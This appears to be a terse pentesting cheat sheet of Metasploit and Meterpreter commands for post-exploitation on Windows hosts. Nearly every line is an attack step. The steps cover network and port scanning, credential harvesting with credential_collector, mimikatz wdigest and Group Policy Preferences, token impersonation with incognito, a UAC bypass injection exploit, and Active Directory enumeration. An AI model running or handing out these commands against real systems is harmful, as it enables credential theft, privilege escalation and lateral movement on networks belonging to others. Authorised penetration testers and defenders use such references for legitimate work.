Metasploit
run arp_scanner -r <iP>/24
db_nmap -sS -A <IP>
run auxiliary/scanner/portscan/tcp
run post/windows/gather/enum_applications
run post/windows/gather/credentials/credential_collector
load mimikatz
wdigest
load incognito
list_tokens -u
# Collect a load of info
run winenum
# Show privs
run post/windows/gather/win_privs
# Run as
use exploit/windows/local/run_as
# Bypass UAC
use exploit/windows/local/bypassuac_injection
# Enumeration ADSI
load extapi
help extapi
adsi_computer_enum domainname
# GPP
use post/windows/gather/credentials/gpp
Last modified 2yr ago